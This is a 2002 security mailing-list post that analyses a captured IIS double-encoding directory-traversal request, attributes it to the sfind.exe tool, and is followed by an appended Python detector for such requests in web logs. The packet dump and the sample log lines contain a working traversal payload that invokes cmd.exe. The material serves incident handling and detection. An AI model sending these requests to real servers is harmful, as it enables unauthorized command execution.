I think the single-request attack you describe corresponds to this payload:

06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80
TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0xC14916B  Ack: 0xC6B3FB9C  Win: 0x40B0  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  255c%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 0D 0A                 xe?/c+dir..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

If Unicode translation is applied, %255c%255c is seen as %5c%%5c. This request is sent by the unicode option of the sfind.exe tool. Sfind.exe originates from China; I have seen it used in different toolkits for semi-automated establishment of Warez "FXP" servers on vulnerable IIS servers, see http://www.esec.dk/pubstro.pdf

Best regards,
Peter Jelver

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
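A defender-side check for the double decoding described in the post, added here as an example and not part of Peter Jelver's message: it percent-decodes a request path repeatedly, as a lenient server would, and reports traversal that only becomes visible after the second decode round (the %255c case). The W3C-style log lines and the three-round decode limit are assumptions.

```python
# Added example, not from the post. Assumes W3C-style logs (see SAMPLE_LOG).
import posixpath
from urllib.parse import unquote
MAX_DECODE_ROUNDS = 3  # assumption: a few rounds is enough in practice

def decode_rounds(path):
    # Successive percent-decodings until the text stops changing
    rounds = [path]
    for _ in range(MAX_DECODE_ROUNDS):
        nxt = unquote(rounds[-1])
        if nxt == rounds[-1]:
            break
        rounds.append(nxt)
    return rounds

def escapes_root(path):
    # True when '..' segments climb above the web root ('\' counts as '/')
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def analyze_path(raw_path):
    # Round 0 is the raw path, 1 a single decode, 2+ double-encoded (%255c)
    rounds = decode_rounds(raw_path.split("?", 1)[0])
    first = next((i for i, p in enumerate(rounds) if escapes_root(p)), None)
    return {"canonical": posixpath.normpath(rounds[-1].replace("\\", "/")),
            "traversal": first is not None,
            "double_encoded": first is not None and first >= 2}

SAMPLE_LOG = [  # constructed W3C-style lines: date time client method uri-stem status
    "2002-06-17 18:12:39 192.84.105.44 GET /scripts/..%255c%255c../winnt/system32/cmd.exe 404",
    "2002-06-17 18:12:40 192.84.105.44 GET /scripts/..%5c../winnt/system32/cmd.exe 404",
    "2002-06-17 18:12:41 10.0.0.7 GET /docs/100%25done.html 200",
]

def scan_log(lines):
    # Returns (client, canonical path, double_encoded) for each traversal hit
    hits = []
    for line in lines:
        fields = line.split()
        verdict = analyze_path(fields[4])
        if verdict["traversal"]:
            hits.append((fields[2], verdict["canonical"], verdict["double_encoded"]))
    return hits
```

The benign path with a literal %25 in it decodes once and is not flagged, while the %255c request is reported as a traversal that needed two decode rounds.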
This archive was generated by hypermail 2b30 : Fri Aug 23 2002 - 10:08:13 PDT